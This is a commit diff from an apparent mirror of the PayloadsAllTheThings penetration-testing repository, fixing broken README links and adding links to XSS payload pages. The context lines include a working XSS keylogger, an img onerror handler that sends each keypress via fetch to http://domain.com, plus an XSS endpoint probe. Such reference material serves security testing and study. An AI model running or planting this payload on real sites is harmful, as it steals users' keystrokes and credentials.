mirror of
https://github.com/weyne85/PayloadsAllTheThings.git
synced 2025-10-29 16:57:02 +00:00
Fix README broken links
This commit is contained in:
parent
d1f6e8397d
commit
e6b5dfa3de
@ -1,4 +1,5 @@
|
|||||||
# Bug Hunting Methodology and Enumeration
|
# Bug Hunting Methodology and Enumeration
|
||||||
|

|
||||||
|
|
||||||
## Enumerate all subdomains (only if the scope is *.domain.ext)
|
## Enumerate all subdomains (only if the scope is *.domain.ext)
|
||||||
|
|
||||||
|
|||||||
@ -9,8 +9,8 @@ All sections contain:
|
|||||||
- Some exploits
|
- Some exploits
|
||||||
|
|
||||||
You might also like :
|
You might also like :
|
||||||
- [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/)
|
- [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/)
|
||||||
- [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE Exploits)
|
- [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)
|
||||||
- Shellshock
|
- Shellshock
|
||||||
- HeartBleed
|
- HeartBleed
|
||||||
- Apache Struts 2
|
- Apache Struts 2
|
||||||
|
|||||||
@ -31,6 +31,15 @@ Keylogger for XSS
|
|||||||
<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
|
<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all](http://www.xss-payloads.com/payloads-list.html?a#category=all):
|
||||||
|
- [Taking screenshots using XSS and the HTML5 Canvas](https://www.idontplaydarts.com/2012/04/taking-screenshots-using-xss-and-the-html5-canvas/)
|
||||||
|
- [JavaScript Port Scanner](http://www.gnucitizen.org/blog/javascript-port-scanner/)
|
||||||
|
- [Network Scanner](http://www.xss-payloads.com/payloads/scripts/websocketsnetworkscan.js.html)
|
||||||
|
- [.NET Shell execution](http://www.xss-payloads.com/payloads/scripts/dotnetexec.js.html)
|
||||||
|
- [Redirect Form](http://www.xss-payloads.com/payloads/scripts/redirectform.js.html)
|
||||||
|
- [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html)
|
||||||
|
|
||||||
|
|
||||||
## Identify an XSS endpoint
|
## Identify an XSS endpoint
|
||||||
```
|
```
|
||||||
<script>debugger;</script>
|
<script>debugger;</script>
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user